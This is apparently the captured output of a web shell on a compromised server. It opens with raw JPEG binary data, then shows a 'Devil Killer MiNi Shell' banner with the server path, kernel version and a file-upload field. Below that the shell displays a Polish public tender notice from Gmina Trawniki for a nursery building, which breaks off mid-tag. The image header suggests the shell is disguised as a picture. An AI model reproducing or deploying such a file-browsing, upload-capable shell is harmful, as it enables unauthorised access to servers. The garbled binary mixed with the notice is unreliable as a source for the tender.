JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240624/0038045801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa i modernizacja infrastruktury społecznej, edukacyjnej, kulturalnej<br/>oraz poprawa efektywności energetycznej budynków publicznych Gminy Trawniki. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA TRAWNIKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019840</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">605</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Trawniki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-044</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">trawniki@trawniki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://trawniki.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa i modernizacja infrastruktury społecznej, edukacyjnej, kulturalnej<br/>oraz poprawa efektywności energetycznej budynków publicznych Gminy Trawniki. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a487aae5-320e-11ef-8a31-0e435a8a43bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00380458</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00102305/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Budowa i modernizacja infrastruktury społecznej edukacyjnej, kulturalnej oraz poprawa efektywności energetycznej budynków użyteczności publicznej.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Cz. 1: ze środków Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych oraz ze środków finansowych z Krajowego Planu Odbudowy oraz środków budżetu Państwa w ramach Programu rozwoju instytucji opieki nad dziećmi w wieku do lat 3 „Aktywny Maluch” 2022–2029. Cz. 2: ze środków Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/945319 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie, odbywa się w języku polskim przy użyciu środków komunikacji elektronicznej jakim jest Platforma zakupowa, dostępnej na profilu nabywcy https://platformazakupowa.pl/pn/trawniki .</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zamawiający podaje wymagania techniczne związane z korzystaniem z Platformy zakupowej:<br/>1) stały dostęp do sieci Internet i o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 10, Mac Os x 10.4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3,<br/>7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar,<br/>8) pozostałe wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z Platformy zakupowej zamieszczonym na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/1-regulamin<br/>2. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>3. W zakresie pytań technicznych związanych z działaniem systemu zaleca się kontakt z Centrum Wsparcia Klienta platformazakupowa.pl pod numerem (22) 101 02 02, cwk@platformazakupowa.pl .<br/>3) Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Podpisy kwalifikowane wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać “Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”. W przypadku wykorzystania formatu podpisu XAdES zewnętrzny. Zamawiający wymaga dołączenia odpowiedniej liczby plików, tj. podpisywanych plików z danymi oraz plików podpisu w formacie XAdES.<br/>Ze względu na ilość znaków pozostała treść &#34;Wymagań technicznych i organizacyjnych dot. korespondencji elektronicznej&#34; znajduje się w rozdziale 10 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1)Zamawiający Administrator danych oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27.04.2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (Dz.Urz. UE L 119 z 4.05.2016 r), dalej:RODO, tym samym dane osobowe podane przez Wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>2)Zamawiający wyznaczył Inspektora Ochrony Danych, z którym kontakt możliwy jest za pośrednictwem adres e-mail tomasz.rutkowski@lokalneogniwo.pl.<br/>3)Dane osobowe wykonawcy będą przetwarzane na podstawie art.6 ust.1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego pn. Budowa i modernizacja infrastruktury społecznej, ... Gminy Trawniki zgodnie z ustawą z dnia 11.09.2019 r. Prawo zamówień publicznych (t.j. Dz.U. z 2023 r. poz. 1605), dalej Pzp oraz w celu archiwizacji dokumentacji dotyczącej tego postępowania.<br/>4)Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania zgodnie z art.18, 74 ust. 1 ustawy Pzp, a także art.6 ustawy z 6.09.2001 r. o dostępie do informacji publicznej (Dz.U. z 2020 r poz. 2176, ze zm).<br/>5)Dane osobowe Wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>6)Zamawiający nie planuje przetwarzania danych osobowych Wykonawcy w celu innym niż cel określony powyżej. Jeżeli admin. będzie planował przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane, przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz udzieli jej wszelkich innych stosownych informacji, o których mowa w art.13 ust. 2 RODO.<br/>7)obowiązek podania przez Wykonawcę danych osobowych bezpośrednio dotyczących Wykonawcy jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>8)w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, w tym formie profilowania, stosownie do art.22 RODO;<br/>*Wykonawcy przysługują:<br/>−na podstawie art.15 RODO prawo dostępu do danych osobowych;<br/>−na podstawie art.16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>−na podstawie art.18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art.18 ust.2 RODO;<br/>−prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, w przypadku uznania, że przetwarzanie danych osobowych narusza przepisy RODO;<br/>*nie przysługuje natomiast:<br/>−w związku z art.17 ust.3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−prawo do przenoszenia danych osobowych, o którym mowa w art.20 RODO;<br/>−na podstawie art.21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, albowiem podstawą prawną przetwarzania danych osobowych jest art.6 ust.1 lit. c RODO<br/>9)Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. Do obowiązków tych należą:<br/>a)obowiązek infor. przewidziany w art.13 RODO względem osób fizycz., których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał i przekazał zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego;<br/>b)obowiązek infor. wynikający z art.14 RODO względem osób fizycz., których dane wykonawca pozyskał w sposób pośredni, a które to dane wykonawca przekazuje zamawiającemu w treści oferty lub dokum. składanych na żądanie zamawiającego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1) Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków skazujących i czynów zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu terminu na ich wniesienie.<br/>2) Udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne, przekonania religijne lub światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych genetycznych, danych biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub danych dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby), zebranych w toku postępowania o udzielenie zamówienia.<br/>3) W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych z prawem wykonawcy do uzyskania od administratora potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące, prawem wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, o których mowa w art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub organizacji międzynarodowej oraz prawem otrzymania przez wykonawcę od administratora kopii danych osobowych podlegających przetwarzaniu), zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>4) Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym mowa w art. 16 RODO (z uprawnienia do sprostowania lub uzupełnienia danych osobowych), nie może naruszać integralności protokołu postępowania oraz jego załączników.<br/>5) W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>6) W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RRG.271.6.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa żłobka w miejscowości Trawniki:<br/>Zakres obejmuje budowę nowoprojektowanego budynku żłobka, wolnostojącego, parterowego bez podpiwniczenia wraz z zewnętrzną instalacją kanalizacji sanitarnej, zewnętrzną zalicznikową linią kablową, nową instalacją oświetlenia terenu, utwardzeniami terenu i nasadzeniem zieleni – zgodnie z dokumentacją projektową i pozwoleniem na budowę.<br/>Zakres prac obejmować będzie w szczególności:<br/>- branżę budowlaną (roboty w zakresie przygotowania terenu pod budowę i roboty ziemne; fundamenty; podłoże posadzki parteru; konstrukcja nadziemia; dach; ślusarka drzwiowa i okienna, elewacja; tynki i okładziny wewnętrzne; sufity podwieszane; posadzki; wyposażenie; opaska wokół budynku; miejsca postojowe; ogrodzenie; zieleń),<br/>- branżę sanitarną (przyłącze wodociągowe i przyłącze kanalizacji sanitarnej do budynku; wewnętrzne instalacje sanitarne – pompa ciepła, instalacja centralnego ogrzewania, instalacja wodociągowa, instalacja hydrantowa, instalacja kanalizacji sanitarnej, instalacja wentylacji; zewnętrzna instalacja kanalizacji sanitarnej),<br/>- branżę elektryczną (zasilanie; zewnętrzne instalacje elektryczne; rozdzielnice elektryczne; WLZ-ty; trasy kablowe; instalacja oświetlenia podstawowego i awaryjnego; instalacja gniazd i siły; instalacja odgromowa i połączeń wyrównawczych; instalacja fotowoltaiczna; prace dodatkowe),<br/>- branżę telekomunikacyjną (rurociąg kablowy dla potrzeb operatorów telekomunikacyjnych; trasy kablowe; system okablowania strukturalnego; system telewizji przemysłowej CCTV IP; system sygnalizacji włamania i napadu SSWiN; instalacja systemu przywoławczego w toaletach dla niepełnosprawnych; instalacja systemu rejestracji czasu pobytu dzieci w placówce oświatowej; instalacja domofonowa; dokumentacja powykonawcza). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45262311-4 - Betonowanie konstrukcji</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45422000-1 - Roboty ciesielskie</p> <p class="mb-0">45262000-1 - Specjalne roboty budowlane inne niż dachowe</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45432000-4 - Kładzenie i wykładanie podłóg, ścian i tapetowanie ścian</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45261210-9 - Wykonywanie pokryć dachowych</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45314300-4 - Instalowanie infrastruktury okablowania</p> <p class="mb-0">32421000-0 - Okablowanie sieciowe</p> <p class="mb-0">32562000-0 - Kable światłowodowe</p> <p class="mb-0">32423000-4 - Gniazda sieciowe</p> <p class="mb-0">32422000-7 - Elementy składowe sieci</p> <p class="mb-0">32424000-1 - Infrastruktura sieciowa</p> <p class="mb-0">09331100-9 - Kolektory słoneczne do produkcji ciepła</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej zarówno w zakresie Części I, jak i II zamówienia, Zamawiający będzie się kierował następującymi kryteriami:<br/>Kryteria oceny ofert:<br/>a) Cena (C) – 60%<br/>b) Okres gwarancji na wykonane roboty budowlane i zastosowane materiały budowlane (PG) – 40%<br/>1.1. Ocena ofert dokonywana będzie według następujących wzorów:<br/>a) Kryterium cena - C - cena waga 60% (60 pkt maksymalnie)<br/>Ilość punktów przyznanych danej ofercie wylicza się na podstawie wzoru:<br/> (Cn) - najniższa cena brutto<br/>C = –―–―–―–―–―–―–―–―–―– x 60<br/> (Co) - cena oferty badanej brutto<br/>b) Kryterium Okres gwarancji na wykonane roboty budowlane i zastosowane materiały budowlane PG – okres gwarancji waga 40% (40 pkt maksymalnie)<br/>Punkty w kryterium „Okres gwarancji na wykonane roboty budowlane i zastosowane materiały budowlane” przyznawane będą zgodnie z poniższą zasadą:<br/>Minimalny okres gwarancji jaką Wykonawca może zaoferować wynosi 36 miesięcy. W przypadku zaoferowania minimalnego okresu gwarancji tj. 36 miesięcy oferta Wykonawcy otrzyma 0,00 pkt (zero punktów). W przypadku zaoferowania gwarancji poniżej minimalnego okresu (tj. mniej niż 36 miesięcy) oferta zostanie odrzucona. Jeżeli Wykonawca w ofercie w ogóle nie wskaże okresu gwarancji, Zamawiający przyjmie, ze Wykonawca nie oferuje gwarancji. W takim przypadku oferta również zostanie odrzucona.<br/>W przypadku, gdy Wykonawca zaoferuje okres gwarancji wynoszący 60 miesięcy, oferta otrzyma 40,00 pkt (maksymalna ilość punktów w tym kryterium). Wykonawca może zaoferować okres gwarancji dłuższy niż wyznaczony maksymalny 60 miesięcy, jednak w takim przypadku Zamawiający przyjmie do obliczeń wartość 60 miesięcy, za co oferta Wykonawcy otrzyma 40,00 pkt.<br/>c) Punkty uzyskane łącznie w kryterium cena i gwarancja stanowić będą ocenę danej oferty. <br/>S (suma)= C (cena) + PG (Okres gwarancji na wykonane roboty budowlane i zastosowane materiały budowlane)<br/>S - suma punktów uzyskanych w kryterium cena i okres gwarancji<br/>C – liczba punktów uzyskanych w kryterium cena<br/>PG – liczba punktów uzyskanych w kryterium okres gwarancji na wykonane roboty budowlane i zastosowane materiały budowlane<br/>1.2. Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów przyznaną wg wzoru wskazanego w pkt 6.1.1. lit. c).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 